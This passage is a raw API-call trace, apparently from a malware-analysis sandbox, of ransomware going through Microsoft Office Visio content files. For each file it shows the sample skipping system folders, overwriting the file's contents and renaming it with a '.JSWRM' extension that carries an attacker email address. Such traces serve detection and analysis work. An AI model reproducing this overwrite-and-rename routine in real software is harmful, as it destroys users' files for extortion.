content\\1033\\appl_visio2013_m.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\APPL_VISIO2013_M.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\appl_visio2013_m.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0144.261] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x297d49a, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x297d49a, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x297d49a, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x14cbf, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="APPL_VISIO2013_U.VSSX", cAlternateFileName="APPL_V~1.VSS")) returned 1 [0144.261] lstrcmpiW (lpString1="APPL_VISIO2013_U.VSSX", lpString2=".") returned 1 [0144.261] lstrcmpiW (lpString1="APPL_VISIO2013_U.VSSX", lpString2="..") returned 1 [0144.261] lstrcmpiW (lpString1="APPL_VISIO2013_U.VSSX", lpString2="...") returned 1 [0144.261] lstrcmpiW (lpString1="APPL_VISIO2013_U.VSSX", lpString2="windows") returned -1 [0144.261] lstrcmpiW (lpString1="APPL_VISIO2013_U.VSSX", lpString2="recovery") returned -1 [0144.261] lstrcmpiW (lpString1="APPL_VISIO2013_U.VSSX", lpString2="perflogs") returned -1 [0144.261] lstrcmpiW (lpString1="APPL_VISIO2013_U.VSSX", lpString2="documents and settings") returned -1 [0144.261] lstrcmpiW (lpString1="APPL_VISIO2013_U.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0144.261] lstrcmpiW (lpString1="APPL_VISIO2013_U.VSSX", lpString2="system volume information") returned -1 [0144.261] lstrcmpiW (lpString1="APPL_VISIO2013_U.VSSX", lpString2="msocache") returned -1 [0144.261] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="APPL_VISIO2013_U.VSSX", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0144.261] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="APPL_VISIO2013_U.VSSX", cchWideChar=21, lpMultiByteStr=0x240ef8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="APPL_VISIO2013_U.VSSX", lpUsedDefaultChar=0x0) returned 21 [0144.261] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="APPL_VISIO2013_U.VSSX", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0144.261] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="APPL_VISIO2013_U.VSSX", cchWideChar=21, lpMultiByteStr=0x241010, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="APPL_VISIO2013_U.VSSX", lpUsedDefaultChar=0x0) returned 21 [0144.261] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0144.261] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0144.261] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\APPL_VISIO2013_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\appl_visio2013_u.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0144.262] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=85183) returned 1 [0144.262] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.262] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x14cb0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x14cb0, lpOverlapped=0x0) returned 1 [0144.269] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.269] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x14cb0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x14cb0, lpOverlapped=0x0) returned 1 [0144.270] CloseHandle (hObject=0x314) returned 1 [0144.270] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\APPL_VISIO2013_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\appl_visio2013_u.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\APPL_VISIO2013_U.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\appl_visio2013_u.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0144.271] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1c3a235, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1c3a235, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x1c3a235, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0xfd88, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="ARROWS_M.VSSX", cAlternateFileName="ARROWS~2.VSS")) returned 1 [0144.271] lstrcmpiW (lpString1="ARROWS_M.VSSX", lpString2=".") returned 1 [0144.271] lstrcmpiW (lpString1="ARROWS_M.VSSX", lpString2="..") returned 1 [0144.271] lstrcmpiW (lpString1="ARROWS_M.VSSX", lpString2="...") returned 1 [0144.271] lstrcmpiW (lpString1="ARROWS_M.VSSX", lpString2="windows") returned -1 [0144.271] lstrcmpiW (lpString1="ARROWS_M.VSSX", lpString2="recovery") returned -1 [0144.271] lstrcmpiW (lpString1="ARROWS_M.VSSX", lpString2="perflogs") returned -1 [0144.271] lstrcmpiW (lpString1="ARROWS_M.VSSX", lpString2="documents and settings") returned -1 [0144.271] lstrcmpiW (lpString1="ARROWS_M.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0144.271] lstrcmpiW (lpString1="ARROWS_M.VSSX", lpString2="system volume information") returned -1 [0144.271] lstrcmpiW (lpString1="ARROWS_M.VSSX", lpString2="msocache") returned -1 [0144.271] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ARROWS_M.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0144.271] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ARROWS_M.VSSX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ARROWS_M.VSSX", lpUsedDefaultChar=0x0) returned 13 [0144.271] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ARROWS_M.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0144.272] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ARROWS_M.VSSX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ARROWS_M.VSSX", lpUsedDefaultChar=0x0) returned 13 [0144.272] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0144.272] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0144.272] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\ARROWS_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\arrows_m.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0144.273] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=64904) returned 1 [0144.273] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.273] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0xfd80, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0xfd80, lpOverlapped=0x0) returned 1 [0144.278] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.278] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xfd80, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0xfd80, lpOverlapped=0x0) returned 1 [0144.279] CloseHandle (hObject=0x314) returned 1 [0144.279] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\ARROWS_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\arrows_m.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\ARROWS_M.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\arrows_m.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0144.280] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xa326fd, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0xa326fd, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x1264b79, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0xf340, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="ARROWS_U.VSSX", cAlternateFileName="ARROWS~1.VSS")) returned 1 [0144.280] lstrcmpiW (lpString1="ARROWS_U.VSSX", lpString2=".") returned 1 [0144.280] lstrcmpiW (lpString1="ARROWS_U.VSSX", lpString2="..") returned 1 [0144.280] lstrcmpiW (lpString1="ARROWS_U.VSSX", lpString2="...") returned 1 [0144.280] lstrcmpiW (lpString1="ARROWS_U.VSSX", lpString2="windows") returned -1 [0144.280] lstrcmpiW (lpString1="ARROWS_U.VSSX", lpString2="recovery") returned -1 [0144.280] lstrcmpiW (lpString1="ARROWS_U.VSSX", lpString2="perflogs") returned -1 [0144.280] lstrcmpiW (lpString1="ARROWS_U.VSSX", lpString2="documents and settings") returned -1 [0144.280] lstrcmpiW (lpString1="ARROWS_U.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0144.280] lstrcmpiW (lpString1="ARROWS_U.VSSX", lpString2="system volume information") returned -1 [0144.280] lstrcmpiW (lpString1="ARROWS_U.VSSX", lpString2="msocache") returned -1 [0144.280] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ARROWS_U.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0144.280] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ARROWS_U.VSSX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ARROWS_U.VSSX", lpUsedDefaultChar=0x0) returned 13 [0144.280] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ARROWS_U.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0144.280] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ARROWS_U.VSSX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ARROWS_U.VSSX", lpUsedDefaultChar=0x0) returned 13 [0144.280] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0144.280] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0144.280] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\ARROWS_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\arrows_u.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0144.282] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=62272) returned 1 [0144.282] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.282] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0xf340, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0xf340, lpOverlapped=0x0) returned 1 [0144.288] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.288] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xf340, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0xf340, lpOverlapped=0x0) returned 1 [0144.288] CloseHandle (hObject=0x314) returned 1 [0144.289] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\ARROWS_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\arrows_u.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\ARROWS_U.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\arrows_u.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0144.290] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x49145b3, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x49145b3, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x49145b3, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0xeb27, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="ASSOCIATIONS_UML_CLASS_M.VSTX", cAlternateFileName="ASSOCI~1.VST")) returned 1 [0144.290] lstrcmpiW (lpString1="ASSOCIATIONS_UML_CLASS_M.VSTX", lpString2=".") returned 1 [0144.290] lstrcmpiW (lpString1="ASSOCIATIONS_UML_CLASS_M.VSTX", lpString2="..") returned 1 [0144.290] lstrcmpiW (lpString1="ASSOCIATIONS_UML_CLASS_M.VSTX", lpString2="...") returned 1 [0144.290] lstrcmpiW (lpString1="ASSOCIATIONS_UML_CLASS_M.VSTX", lpString2="windows") returned -1 [0144.290] lstrcmpiW (lpString1="ASSOCIATIONS_UML_CLASS_M.VSTX", lpString2="recovery") returned -1 [0144.290] lstrcmpiW (lpString1="ASSOCIATIONS_UML_CLASS_M.VSTX", lpString2="perflogs") returned -1 [0144.290] lstrcmpiW (lpString1="ASSOCIATIONS_UML_CLASS_M.VSTX", lpString2="documents and settings") returned -1 [0144.290] lstrcmpiW (lpString1="ASSOCIATIONS_UML_CLASS_M.VSTX", lpString2="$RECYCLE.BIN") returned 1 [0144.290] lstrcmpiW (lpString1="ASSOCIATIONS_UML_CLASS_M.VSTX", lpString2="system volume information") returned -1 [0144.290] lstrcmpiW (lpString1="ASSOCIATIONS_UML_CLASS_M.VSTX", lpString2="msocache") returned -1 [0144.290] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ASSOCIATIONS_UML_CLASS_M.VSTX", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0144.290] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ASSOCIATIONS_UML_CLASS_M.VSTX", cchWideChar=29, lpMultiByteStr=0x2412b8, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ASSOCIATIONS_UML_CLASS_M.VSTX", lpUsedDefaultChar=0x0) returned 29 [0144.290] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ASSOCIATIONS_UML_CLASS_M.VSTX", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0144.290] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ASSOCIATIONS_UML_CLASS_M.VSTX", cchWideChar=29, lpMultiByteStr=0x2411c8, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ASSOCIATIONS_UML_CLASS_M.VSTX", lpUsedDefaultChar=0x0) returned 29 [0144.290] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0144.290] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0144.290] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\ASSOCIATIONS_UML_CLASS_M.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\associations_uml_class_m.vstx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0144.291] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=60199) returned 1 [0144.291] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.291] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0xeb20, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0xeb20, lpOverlapped=0x0) returned 1 [0144.296] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.296] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xeb20, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0xeb20, lpOverlapped=0x0) returned 1 [0144.297] CloseHandle (hObject=0x314) returned 1 [0144.297] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\ASSOCIATIONS_UML_CLASS_M.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\associations_uml_class_m.vstx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\ASSOCIATIONS_UML_CLASS_M.VSTX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\associations_uml_class_m.vstx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0144.298] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x49145b3, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x49145b3, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x49145b3, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0xdf2a, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="ASSOCIATIONS_UML_CLASS_U.VSTX", cAlternateFileName="ASSOCI~2.VST")) returned 1 [0144.298] lstrcmpiW (lpString1="ASSOCIATIONS_UML_CLASS_U.VSTX", lpString2=".") returned 1 [0144.298] lstrcmpiW (lpString1="ASSOCIATIONS_UML_CLASS_U.VSTX", lpString2="..") returned 1 [0144.298] lstrcmpiW (lpString1="ASSOCIATIONS_UML_CLASS_U.VSTX", lpString2="...") returned 1 [0144.298] lstrcmpiW (lpString1="ASSOCIATIONS_UML_CLASS_U.VSTX", lpString2="windows") returned -1 [0144.298] lstrcmpiW (lpString1="ASSOCIATIONS_UML_CLASS_U.VSTX", lpString2="recovery") returned -1 [0144.298] lstrcmpiW (lpString1="ASSOCIATIONS_UML_CLASS_U.VSTX", lpString2="perflogs") returned -1 [0144.298] lstrcmpiW (lpString1="ASSOCIATIONS_UML_CLASS_U.VSTX", lpString2="documents and settings") returned -1 [0144.298] lstrcmpiW (lpString1="ASSOCIATIONS_UML_CLASS_U.VSTX", lpString2="$RECYCLE.BIN") returned 1 [0144.298] lstrcmpiW (lpString1="ASSOCIATIONS_UML_CLASS_U.VSTX", lpString2="system volume information") returned -1 [0144.298] lstrcmpiW (lpString1="ASSOCIATIONS_UML_CLASS_U.VSTX", lpString2="msocache") returned -1 [0144.298] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ASSOCIATIONS_UML_CLASS_U.VSTX", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0144.298] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ASSOCIATIONS_UML_CLASS_U.VSTX", cchWideChar=29, lpMultiByteStr=0x240fe8, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ASSOCIATIONS_UML_CLASS_U.VSTX", lpUsedDefaultChar=0x0) returned 29 [0144.298] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ASSOCIATIONS_UML_CLASS_U.VSTX", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0144.298] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ASSOCIATIONS_UML_CLASS_U.VSTX", cchWideChar=29, lpMultiByteStr=0x241330, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ASSOCIATIONS_UML_CLASS_U.VSTX", lpUsedDefaultChar=0x0) returned 29 [0144.298] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0144.298] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0144.299] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\ASSOCIATIONS_UML_CLASS_U.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\associations_uml_class_u.vstx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0144.299] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=57130) returned 1 [0144.299] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.300] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0xdf20, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0xdf20, lpOverlapped=0x0) returned 1 [0144.305] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.305] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xdf20, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0xdf20, lpOverlapped=0x0) returned 1 [0144.305] CloseHandle (hObject=0x314) returned 1 [0144.306] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\ASSOCIATIONS_UML_CLASS_U.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\associations_uml_class_u.vstx"), 